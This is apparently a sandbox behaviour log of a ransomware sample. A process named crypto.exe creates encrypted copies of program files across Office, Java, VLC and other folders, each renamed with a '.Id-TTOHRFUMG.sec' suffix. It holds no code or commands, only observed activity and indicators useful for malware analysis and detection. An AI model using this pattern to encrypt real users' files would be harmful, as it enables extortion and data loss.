File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05870_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACCESS12.ACC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01637_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\MSOSEC.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\flavormap.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Makassar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLFLTR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\psuser.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01173_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS53BOXS.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\HEADINGBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14753_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR3F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02264_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00127_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libhttp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libd3d11va_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\TAG.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMSL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Austin.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LOGO98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_bezel.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EAWFINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmjpeg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\RSSFeeds.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105414.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatializer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OMML2MML.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01561_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OriginLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSPST32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\THOCR.PSP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_bezel.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\j2pcsc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105348.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196164.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\WordpadFilter.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21534_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Essential.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\HEADINGBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sr-spl.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02424_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdiracsys_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\MSOERES.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Essential.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Havana.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00397_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.OPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_scrapbook_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\LICENSE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\sunec.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ConvertFromAdd.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15273_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\BCSRuntimeRes.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\javacpl.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jsound.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_fil.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14692_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.PPT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\liblibmpeg2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeXMP.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\en-US\Sidebar.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLINACC.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libyuv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\APPTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02187_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SETLANG_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\Analysis\ATPVBAEN.XLAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL106.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBAR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\liblogger_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libswscale_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePage.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OnLineIdle.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01123_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103812.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jvm.hprof.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107500.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00646_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libantiflicker_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\jnwppr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\APPT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196374.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_wav_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\mpvis.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15136_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESNS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libdvdread_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
